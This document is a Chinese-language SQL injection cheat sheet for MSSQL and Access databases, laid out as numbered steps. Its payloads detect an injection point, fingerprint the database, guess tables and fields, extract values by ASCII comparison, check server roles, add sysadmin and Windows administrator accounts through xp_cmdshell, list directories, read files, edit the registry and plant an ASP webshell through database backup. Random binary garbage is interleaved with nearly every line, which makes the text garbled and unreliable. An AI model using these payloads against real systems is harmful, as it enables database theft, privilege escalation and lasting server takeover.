1.判断是否有注入;and 1=1 ;and 1=2 z��<u*I@;�
2.初步判断是否是mssql ;and user>0 �O.Xhi��+
rctGa ,l��
3.注入参数是字符'and [查询条件] and ''=' �:.bBV]�6q
tR`�^c�8gD
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �+Cg[!6[#�
�=�Y`e?\#`
5.判断数据库系统 0wnC"2GUX�
�7Z�[6_WD3
;and (select count(*) from sysobjects)>0 mssql �h�5�1)kN:
9T;DF�U��M
;and (select count(*) from msysobjects)>0 access d;FO��mo�4
*m��t��S\J
eRm �9L�Op
]�r.9�5|V*
6.猜数据库 ;and (select Count(*) from [数据库名])>0 w�Mv�Am%}+
�f��uao*L]
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ~�l�H_�d�[
G'IRqO�*]
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 wx[Y2l�Uh6
u�P NZ^l�M
9.(1)猜字段的ascii值(access) # �;��3v4P
%&}gt+L�(M
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 fZk�a��$
4
h�=�
�M�md
(2)猜字段的ascii值(mssql)
�'L�W~_�\
oj%��(@6�L
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 (F=�q/l�K$
*�pj��^d><
10.测试权限结构(mssql) (Jd�Z�l2A.
��w gU2q|
�XkR�P�D�
Y�E;Tp�ji�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- h6��~��H5X
EaN1xb(DYa
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- B�6J��<���
�9AP�."�RV
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- S\<nCk�E^�
_�Y� _�v�&
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- f�b|%)��A=
�M� T]2n{e
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- V_�"UiN"o�
!��Y^3%�B%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &MJ�cLM�]�
n���X�M[#~
;and 1=(select IS_MEMBER('db_owner'));-- Q|7l!YTzVu
< VrH�WJo
�J>N^�FR9�
G�c��*p%2c
11.添加mssql和系统的帐户 |�{�V@�t1`
7�&w$@zs87
;exec master.dbo.sp_addlogin username;-- K.r
"KxCm|
;exec master.dbo.sp_password null,username,password;-- BRTCo,i���
�=QS%D*.|D
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- oc��PM zq-
\#�7@"�~<�
;exec master.dbo.xp_cmdshell 'net user username password �S pId�w�0
�iT�c�q�=
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �05s{Z.aK�
O��KV/=]GS
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Y�>�J�u$�i
~sMEfY,�p�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- '�)z�f8>,�
S'�}�pUGDO
vR*p1Kq��:
y�#v<V1b]�
12.(1)遍历目录 �t~_bquGk
^E�]��y >Y
;create table dirs(paths varchar(100), id int) ;/�ASl<t,
OOZ�x�s?pR
;insert dirs exec master.dbo.xp_dirtree 'c:\' )Szg�MbF6�
,~*pP�hQ8m
;and (select top 1 paths from dirs)>0 �0dCg/�wJx
"Ta�"�5X�W
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) *��o6hDh�g
��Ye]-RN/W
�]����U�S
pE38���1Cw
(2)遍历目录 �[Z�2m�H��
GZzB�AT�x�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- sh)[�|?7�z
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �7�p_B?r��
^�,�{ r[}�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �3A!Qu$r9�
)Mee�F-Ad6
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �O�#�n=�mJ
�`h=�'FJ/!
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 p�SdtA�v��
�H:�]'r5sw
fb��?�YD�M
�'cPE7u�NT
13.mssql中的存储过程 �!EOY�q�D�
@&f�~#X��e
xp_regenumvalues 注册表根键, 子键 �E-v^�eMWX
IN?6~��O
p
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 |Ng}ZLBM��
�RC�~�C}��
xp_regread 根键,子键,键值名 E~
+g6�YlT
,b�9!\OWDF
;exec xp_regread E�I8KK�o *
:=?od
0�]W
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 h@j�k3J�9^
j^��m �x�,
xp_regwrite 根键,子键, 值名, 值类型, 值 �l?O�%yf`s
)�7� � ��M
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 tQ,3nI!|xF
;(
[^�+_/
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 a[ yyEgm2�
/|p6NK;8�L
xp_regdeletevalue 根键,子键,值名 -��Ra-��Ux
/3j3'�~�0�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 v~�:'t\��n
�*]*0�u�o
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��GQ6~Si2�
O"9Or��3w�
B�m�v5yc+;
|h-e+Wh��1
14.mssql的backup创建webshell 6kH��uKxY,
�h�x�kw��T
use model ( 9�(�NP_s
I�Vso/! �
create table cmd(str image); $f�AZ^� ��
?X�@uR5�?{
insert into cmd(str) values (''); k-I� U}|Xz
\[<8AV"E-'
backup database model to disk='c:\l.asp'; n'8���3P%x
`{H!V~�4�2
G��P0}I@>?
��$�_�O;yz
15.mssql内置函数 0?*":o30�
C&f{Lp�B�`
;and (select @@version)>0 获得Windows的版本号 O�Z4%�6��/
51 "�v`O+�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa o[aIQ|�G�
;�N�^4R$Q.
;and (select user_name())>0 爆当前系统的连接用户 .#LvvAeh��
��J��Z)w��
;and (select db_name())>0 得到当前连接的数据库 B4{F)�Zb��
&
Tkl-{I��
�
C:���p�`
�6��ag0c&k
16.简洁的webshell wR�u�\9H}�
rO]2we/B,4
use model " nL�W�vV1
S�I/�3�Dz[
create table cmd(str image); AA5�UOg\jI
[�<.dO�e7|
insert into cmd(str) values (''); 7�T?T0x3>
�>:|j�ds�#
backup database model to disk='g:\wwwtest\l.asp';
